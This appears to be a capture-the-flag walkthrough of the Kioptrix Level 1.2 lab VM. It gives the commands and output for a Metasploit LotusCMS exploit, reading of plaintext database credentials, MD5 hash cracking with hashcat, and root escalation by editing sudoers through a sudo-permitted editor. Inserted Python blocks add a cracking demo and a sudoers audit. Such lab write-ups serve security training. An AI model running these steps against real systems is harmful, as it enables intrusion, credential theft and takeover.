Kioptrix: Level 1.2 (#3)

Note: As described on the Kioptrix page, don't forget to add the target IP to Kali's hosts file.

Find the target IP: nmap 172.16.219.0/24

Probe services: nmap -sV -sC 172.16.219.170

root@kali:# nmap -sV -sC 172.16.219.170

Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-17 01:05 PST
Nmap scan report for 172.16.219.170
Host is up (0.000084s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:0C:EA:83 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds

Navigate to 172.16.219.170; there's a login page at http://172.16.219.170/index.php?system=Admin

Note the "Proudly Powered by: LotusCMS" text at the bottom of the login box.

Googled LotusCMS and found there's a Metasploit module for it.

msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(multi/http/lcms_php_exec) > set RHOST 172.16.219.170
RHOST => 172.16.219.170
msf exploit(multi/http/lcms_php_exec) > set URI /index.php?system=Admin
URI => /index.php?system=Admin
msf exploit(multi/http/lcms_php_exec) > exploit
meterpreter > ls
Listing: /home/www/kioptrix3.com
================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   4096   dir   2011-04-15 06:21:17 -0700  cache
40777/rwxrwxrwx   4096   dir   2011-04-14 09:24:17 -0700  core
40777/rwxrwxrwx   4096   dir   2011-04-14 09:24:17 -0700  data
100644/rw-r--r--  23126  fil   2011-04-14 09:23:13 -0700  favicon.ico
40755/rwxr-xr-x   4096   dir   2011-04-14 08:32:31 -0700  gallery
100644/rw-r--r--  26430  fil   2011-04-14 09:23:13 -0700  gnu-lgpl.txt
100644/rw-r--r--  399    fil   2011-04-14 09:23:13 -0700  index.php
40777/rwxrwxrwx   4096   dir   2011-04-14 09:24:17 -0700  modules
40777/rwxrwxrwx   4096   dir   2011-04-14 09:24:17 -0700  style
100644/rw-r--r--  243    fil   2011-04-14 09:23:13 -0700  update.php

Under the gallery folder there's a gconfig.php file. Printing the file content reveals the following creds:

    $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

Use the creds "root" and "fuckeyou" to log in to http://kioptrix3.com/phpmyadmin/

Then, navigating to the SQL tab, I am able to run any SQL queries. From the web interface I found the database gallery has a table named dev_accounts.

Or list all tables using the query: SELECT * FROM information_schema.tables

The dev_accounts table has the following info:

Now it's time to crack the passwords. Hashcat doesn't work on my Kali, so I used john. But john could only crack one hash. Then I tried to use the Offensive Security customized Kali. It worked!

root@kali:~/Downloads# hashcat -m 0 h.txt /usr/share/wordlists/rockyou.txt --force
……

5badcaf789d3d1d09794d8f021f40f0e:starwars                 
0d3eccfb887aabd50f243b3f155c0f85:Mast3r
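An added example, not from the writeup: the dictionary check that hashcat -m 0 performs, run against the two dev_accounts hashes above with a constructed six-word stand-in for rockyou.txt, beside a salted, iterated PBKDF2 store that would have forced a separate wordlist pass per account. The PBKDF2 helpers and their record format are my own illustration, not how the gallery application stores anything.

```python
"""Why the dev_accounts hashes fell: unsalted MD5 against a wordlist,
contrasted with a salted, iterated hash of the same passwords."""
import hashlib
import hmac
import os
from typing import Dict, List

# The two hashes from the writeup's hashcat output (dev_accounts table).
HASHES = ["5badcaf789d3d1d09794d8f021f40f0e", "0d3eccfb887aabd50f243b3f155c0f85"]
# Constructed stand-in for rockyou.txt: a few candidate passwords.
WORDLIST = ["password", "123456", "starwars", "letmein", "Mast3r", "qwerty"]


def md5_hex(word: str) -> str:
    """Hex MD5 of a candidate password, the form stored in dev_accounts."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def crack_md5(hashes: List[str], wordlist: List[str]) -> Dict[str, str]:
    """Return {hash: plaintext} for each hash whose preimage is in the wordlist.
    Unsalted: one digest per word is compared against every target at once."""
    wanted = {h.strip().lower() for h in hashes}
    found: Dict[str, str] = {}
    for word in wordlist:
        digest = md5_hex(word)
        if digest in wanted:
            found[digest] = word
    return found


def pbkdf2_store(password: str, iterations: int = 100_000) -> str:
    """Hardened form (illustrative): random 16-byte salt, PBKDF2-HMAC-SHA256,
    stored as 'iterations$salthex$hashhex'. Each record needs its own pass."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Constant-time check of a password against a pbkdf2_store() record."""
    iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for digest, plain in crack_md5(HASHES, WORDLIST).items():
        print(f"{digest}:{plain}")  # same hash:plain format hashcat prints
    rec = pbkdf2_store("starwars")
    print(rec, pbkdf2_verify("starwars", rec))
```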

SSH as dreg; dreg is not a sudo user. SSH as loneferret; there are two files in the current folder. The CompanyPolicy.README file mentions using "sudo ht" to edit files. Got an error when running "sudo ht".

loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.

Run export TERM=xterm and then run sudo ht. Once the editor is running, press F3 to open files. Open the /etc/sudoers file and append /bin/sh to user loneferret's line. This allows user loneferret to run /bin/sh without a password.

loneferret@Kioptrix3:~$ sudo /bin/sh
# whoami
root
#
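An added defensive check, not part of this writeup: a small Python audit that parses sudoers user specifications and flags any grant of ALL, an editor or a shell, which is the kind of entry (sudo rights to the ht editor) that lets a file editor become a sudoers editor here. The sample sudoers text, the RISKY list and the function names are my own constructions.

```python
"""Audit sudoers user specifications for grants of an editor or a shell."""
import os
import re
from typing import List, Tuple

# Programs that can read or write arbitrary files, or spawn a shell, once they
# run as root; 'ht' is the editor the CompanyPolicy.README points loneferret to.
RISKY = {"ht", "vi", "vim", "nano", "emacs", "less", "more", "sh", "bash", "dash"}

# Constructed sample modelled on the box; not the real /etc/sudoers.
SAMPLE = """\
Defaults env_reset
root    ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
backup  ALL=(root) /usr/bin/rsync  # not an editor or shell: not flagged
"""

def parse_user_specs(sudoers: str) -> List[Tuple[str, bool, List[str]]]:
    """Return (user, nopasswd, commands) for each user specification line."""
    specs = []
    for raw in sudoers.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or "_Alias" in line.split()[0]:
            continue  # comments, Defaults and alias definitions
        parts = line.split(None, 1)
        if len(parts) != 2 or "=" not in parts[1]:
            continue
        user, rest = parts
        _hosts, cmdspec = rest.split("=", 1)
        cmdspec = re.sub(r"^\s*\([^)]*\)\s*", "", cmdspec)  # drop "(runas)"
        nopasswd = False
        while (m := re.match(r"^([A-Z]+):\s*", cmdspec)):  # NOPASSWD:, SETENV: ...
            nopasswd |= m.group(1) == "NOPASSWD"
            cmdspec = cmdspec[m.end():]
        cmds = [c.strip() for c in cmdspec.split(",") if c.strip()]
        specs.append((user, nopasswd, cmds))
    return specs

def audit(sudoers: str) -> List[Tuple[str, str, bool]]:
    """Return (user, command, nopasswd) for every granted command that is ALL
    or whose program basename is a known editor or shell."""
    findings = []
    for user, nopasswd, cmds in parse_user_specs(sudoers):
        for cmd in cmds:
            if cmd.startswith("!"):
                continue  # explicit denial, not a grant
            if cmd == "ALL" or os.path.basename(cmd.split()[0]) in RISKY:
                findings.append((user, cmd, nopasswd))
    return findings
```

Running audit(SAMPLE) reports root's ALL and loneferret's NOPASSWD grant of /usr/local/bin/ht, and the same check on the modified line from this writeup would additionally flag /bin/sh.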

=== Manual injection ===
